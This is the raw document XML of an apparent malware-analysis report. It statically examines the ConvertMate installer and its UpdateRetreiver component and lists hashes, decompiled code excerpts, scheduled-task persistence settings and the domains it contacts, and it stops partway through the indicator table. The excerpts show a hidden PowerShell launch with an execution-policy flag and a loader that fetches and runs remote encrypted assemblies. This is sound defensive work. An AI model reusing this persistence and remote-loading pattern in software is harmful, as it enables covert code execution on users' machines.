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ConvertMate / UpdateRetreiver</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>STATIC REVERSE-ENGINEERING AND INCIDENT EVIDENCE REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Suspected MediaArena-associated installation chain | Analysis date: 26 October 2026 | Classification: Internal / Investigation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Evidence basis: analyst-provided Ghidra screenshots, ILSpy-decompiled source excerpts, archive listings, script contents, and SHA-256 terminal output. This report does not claim access to the original binaries, live server traffic, Microsoft Defender timeline, or dynamically delivered payloads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Executive assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Analysis of the ConvertMate installer and its embedded resources demonstrates an installation workflow, a daily Windows scheduled task, network retrieval of AES-encrypted data, and a managed .NET loader that invokes entry points of assemblies received as byte arrays. These are verified code-level capabilities. The available evidence does not yet show that MediaArena was present in the embedded resources or actually delivered by the remote service.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Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Remote managed assembly loading</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Confirmed in decompiled updater: AppDomain.Load(raw) followed by EntryPoint.Invoke().</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Persistent execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Scheduled-task registration script targets UpdateRetreiver.exe with a daily trigger.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Encrypted delivery protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Updater derives AES key from installation timestamp, IV from request time, and deserializes decrypted JSON into byte arrays.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>MediaArena attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Unconfirmed. No matching Defender detection artifact or recovered server-supplied assembly was provided.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Risk characterization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>High concern; capability consistent with a remotely supplied .NET payload loader. Intent and delivered family remain unresolved.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Scope and methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The analyst examined the original Windows PE/.NET installer in Ghidra, used ILSpy command-line 11.1.0.9782 on Kali with .NET SDK 10.0.403, exported embedded managed assembly resources, listed ZIP contents, extracted executables for static analysis, and searched decompiled C# source. All commands displayed here are static read or extraction operations; no evidence indicates the sample was launched in the Kali environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Evidence confidence terminology</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Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Directly supported by code, script, archive listing, or exact analyst command output.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Inferred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Interpretation connecting directly observed elements, requiring corroboration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Unknown</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Not established by evidence supplied in this investigation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>1. Inventory and integrity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1.1 SHA-256 — executable files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Artifact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>SHA-256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>ConvertMate.exe (original)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>08b9f93000512b45f8c2e8d3d6624536b366e67c40fd4b958db58e3a1d129c3d</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Convert Mate.exe (Native.zip)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>d9f9584f4f071be9c5cf418cae91423c51d53ecf9924ed39b42028d1314a2edc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>UpdateRetreiver.exe (Updating_files.zip)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>09c2af472ab86b62a702e94a39df2bef09205f4249ed871cbeece751c1e7ef4f</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1.2 SHA-256 — exported resources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Resource</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>SHA-256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>StructureV10Logic.Assets.conmate_update.ps1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>372d89d7dd45b2120f45705a4aa331dfff813a4be642971422e470eb725c4646</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>StructureV10Logic.Assets.favicon.ico</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>15a2a5f4ea59cadede671fe8602d0c34892b86fcb82e2b1cbc3d74abd55a38b2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>StructureV10Logic.Assets.Native.zip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>a596d5fe3a3c39ba93abc0509d84fc4522e4c3093cda015261521633b868df22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>StructureV10Logic.Assets.Uninstall.zip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>4272cc70b7b88a36d2517a6ee8d7ba43bc7f193c427d485437d2a8476df1f500</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>StructureV10Logic.Assets.Updating_files.zip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>2958a25ccffa1d8647867dfdab9c9075e72801c277630cd29a26c0a9d5fc0986</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t>Integrity caveat: these hashes are copied from terminal output; they have not been independently recalculated from binary exhibits within this report. Preserve source evidence, acquisition records, extraction timestamps, and hash-verification logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1.3 Embedded archives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Archive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Contents (uncompressed byte size)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Native.zip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Convert Mate.exe (179,496); Newtonsoft.Json.dll (711,952). Total 891,448 bytes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Updating_files.zip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>UpdateRetreiver.exe (34,152); FSharp.Core.dll (2,716,208); Newtonsoft.Json.dll (711,952); System.ValueTuple.dll (78,992). Total 3,541,304 bytes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Uninstall.zip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Exported but contents not listed in supplied evidence.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t>Observed archive metadata: Convert Mate.exe timestamp 2025-02-20 13:38; UpdateRetreiver.exe 2025-08-04 02:23. Archive entry dates are not reliable build-time or compromise-time evidence without corroboration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>2. High-level execution and installation chain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>1. Original ConvertMate.exe .NET installer: provides interface and invokes installation logic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>2. Embedded Native.zip: extracted to %LOCALAPPDATA%\ConvertMate; transient ZIP is then deleted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>3. Installed Convert Mate.exe: launched from nativePath after an affiliate UI event in observed code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>4. Embedded conmate_update.ps1: executed by PowerShell to register ConvertMateTask, conditional on configuration and Chrome presence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>5. Embedded Updating_files.zip: contains UpdateRetreiver.exe targeted by the task.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>6. Daily UpdateRetreiver.exe run: reads local id.txt identifier and creation timestamp.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>7. Authentication to confetly.com/auth; bearer-authenticated retrieval from confetly.com/update.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>8. AES decryption of server response into IEnumerable&lt;byte[]&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>9. AppDomain.Load(byte[]) and EntryPoint.Invoke() attempt in-process execution of each nonempty returned managed assembly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Important branching qualification: the observed installer invokes its product installation after an optional task-registration conditional. The script identifies the updater path, but this report does not establish the precise call-site which extracts Updating_files.zip or whether each installation successfully registers the task.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>3. Original installer decompilation evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 Resource installation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="245"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="263648"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>ProductInstaller.Install():</w:t>
        <w:br/>
        <w:t xml:space="preserve">  text = createAppDataFolder();</w:t>
        <w:br/>
        <w:t xml:space="preserve">  path = dropFavicon(text);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  text2 = dropNativeToFolder(text);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  unzip(text2, text);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  File.Delete(text2);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  File.Delete(path);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The createAppDataFolder() implementation targets Environment.SpecialFolder.LocalApplicationData joined with “ConvertMate”. dropNativeToFolder() retrieves a manifest resource and writes Native.zip; unzip() extracts each non-directory archive entry using its basename and overwrite:true. These findings are from ConvertMate.decompiled.cs, approximately lines 176465–176545.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 User/install identifier</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="245"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="263648"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>string path = Path.Combine(targetFolder, "id.txt");</w:t>
        <w:br/>
        <w:t>if (File.Exists(path)) return File.ReadAllText(path);</w:t>
        <w:br/>
        <w:t>string text = Guid.NewGuid().ToString();</w:t>
        <w:br/>
        <w:t>File.WriteAllText(path, text);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The code creates and reuses a GUID in id.txt. The precise target folder is passed to UserIdCreator.Create(); updater code explicitly reads %LOCALAPPDATA%\ConvertMate\id.txt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.3 Program launch and Chrome checks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="245"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="263648"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>Process.Start(nativePath + "\\Convert Mate.exe");</w:t>
        <w:br/>
        <w:t>// nativePath = logicManager.InstallProduct();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The installer tests for Chrome at standard Program Files and per-user installation paths, reconstructing strings by reversal. Reversed strings reduce plain-text visibility but do not by themselves prove malicious intent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>4. Scheduled-task persistence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 Recovered PowerShell artifact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Recovered exact exported resource: StructureV10Logic.Assets.conmate_update.ps1. It uses the Schedule.Service COM object to register a task in the root Task Scheduler folder.</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Property</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Recovered setting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Task name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>ConvertMateTask</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>%LOCALAPPDATA%\ConvertMate\UpdateRetreiver.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Trigger</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Daily; initial StartBoundary computed as now + 24 hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Principal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>$env:USERDOMAIN\$env:USERNAME; LogonType 3; RunLevel 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>RunOnlyIfNetworkAvailable = true</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Start when available</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>true</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Restart on failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>RestartCount = 2; RestartInterval = PT10M</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Battery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Run permitted on battery and when switching to battery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Existing task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Checks for task and throws ResourceExists before registration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Registration flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>RegisterTaskDefinition(..., 6, ..., 3, ...): create-or-update flag with interactive-token logon type</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 Script execution in installer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="245"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="263648"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>placeInDirectory("conmate_update.ps1", folderPath);</w:t>
        <w:br/>
        <w:t>ProcessStartInfo.Arguments = " -ep RemoteSigned -File \"%s\"";</w:t>
        <w:br/>
        <w:t>ProcessStartInfo.CreateNoWindow = true;</w:t>
        <w:br/>
        <w:t>// PowerShell executable name and UseShellExecute property built from fragments/reflection.</w:t>
        <w:br/>
        <w:t>Process.Start(processStartInfo2);</w:t>
        <w:br/>
        <w:t>File.Delete(text);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The reconstructed launcher uses PowerShell with an execution-policy argument, redirects output/error, and deletes the script after attempting execution. This is observed code, not proof of successful scheduled-task creation on any endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.3 Registration condition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="245"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="263648"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>if (relevant &amp;&amp; isPathExists() &amp;&amp; !register()) { sendPixel(); }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The relevant flag is based on remote KnownValues.DownloadName being empty or beginning with “C”; isPathExists() detects Chrome; register() negates logicManager.Register(). Therefore the exact success semantics require care. The product-installation call follows this condition regardless of its truth value, absent a thrown exception.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>5. Network behavior and remote configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 Domains and paths observed in source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Indicator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Observed role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>banifuri.com/get-known-values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Original installer configuration retrieval</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Hardcoded source string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>banifuri.com/log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Installer logging endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Hardcoded source string</w:t>
